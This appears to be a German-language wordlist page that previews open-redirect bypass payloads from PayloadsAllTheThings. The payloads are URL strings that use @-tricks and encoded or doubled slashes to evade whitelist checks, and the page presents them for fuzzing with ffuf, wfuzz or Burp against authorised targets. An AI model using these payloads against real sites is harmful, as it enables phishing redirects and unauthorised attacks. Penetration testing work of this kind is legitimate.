Open Redirect Payloads (PayloadsAllTheThings)

//google.com/%2f.. //www.whitelisteddomain.tld@google.com/%2f.. ///google.com/%2f.. ///www.whitelisteddomain.tld@google.com/%2f.. ////google.com/%2f.. ////www.whitelisteddomain.tld@google.com/%2f.. https://google.com/%2f.. https://www.whitelisteddomain.tld@google.com/%2f.. /https://google.com/%2f.. /https://www.whitelisteddomain.tld@google.com/%2f.. //www.google.com/%2f%2e%2e //www.whitelisteddomain.tld@www.google.com/%2f%2e%2e ///www.google.com/%2f%2e%2e ///www.whitelisteddomain.tld@www.google.com/%2f%2e%2e ////www.google.com/%2f%2e%2e

Open-Redirect-Bypass-Payloads mit Whitelist-Umgehungstricks (@-Tricks, kodierte Slashes, doppelte Slashes) gegen eine Platzhalterdomain whitelisteddomain.tld. Konzipiert zum Fuzzing von Redirect-/Return-URL-Parametern.

Diese Liste ist auf Input-Fuzzing und Schwachstellen-Discovery ausgerichtet. Sie umfasst etwa 8.5 KB und harmoniert gut mit Tools wie ffuf, wfuzz, burp. Wähle die kleinste Liste, die zu deinem Einsatz passt: Kürzere Listen sind schneller und unauffälliger für Online- Angriffe, während größere Listen eine breitere Abdeckung für Offline-Arbeit bieten, bei der Geschwindigkeit weniger ins Gewicht fällt.

Du kannst die Beispielvorschau direkt von dieser Seite kopieren, die gesamte Liste in die Zwischenablage kopieren oder die rohe .txt-Datei herunterladen. Die vollständige Liste wird direkt aus ihrer ursprünglichen Quelle auf GitHub bereitgestellt.

Bezogen von swisskyrepo/PayloadsAllTheThings und vertrieben unter MIT. Verwende Wortlisten ausschließlich gegen Systeme, für deren Test du ausdrücklich autorisiert bist.

Vorschau